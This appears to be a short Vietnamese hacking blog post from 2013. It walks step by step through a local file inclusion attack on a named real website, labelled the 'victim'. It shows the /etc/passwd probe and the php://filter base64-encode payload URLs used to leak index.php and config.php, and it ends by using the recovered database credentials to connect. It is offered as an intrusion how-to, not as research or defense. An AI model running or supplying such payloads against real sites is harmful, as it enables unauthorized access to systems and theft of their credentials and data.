Thứ Hai, 4 tháng 2, 2013

Tutorial : LFI php://filter

Victim:http://www.hctjstbk.cz/
Bước 1: Tìm link bị lỗi LFI
http://www.hctjstbk.cz/index.php?page=/etc/passwd


Bước 2: Kiểm tra qua /proc/self/environ -> Không được
php://input -> Không được
php://filter/convert.base64-encode/resource=index.php -> okie
Bước 3: Do website mã hóa dùng php://filter file index.php
http://www.hctjstbk.cz/index.php?pag...x.php&soutez=2
[IMG]
This image has been resized.Click to view original image
[/IMG]

Bước 4: View Source copy đoạn mã hóa của file index.php-> vào website giải mã base64 online ở đây mình dùng website
http://www.rbl.jp/base64.php
[IMG]
This image has been resized.Click to view original image
[/IMG]
Bước 5: Sau khi giải mã file index.php để ý đoạn sau config/config.php
Bước 6: php filter file config/config.php
http://www.hctjstbk.cz/index.php?pag...g.php&soutez=2

Viewsource giải mã được database như sau
[IMG]
This image has been resized.Click to view original image
[/IMG]
Bước 7: Connect DB

End tut kakavn_85

Không có nhận xét nào: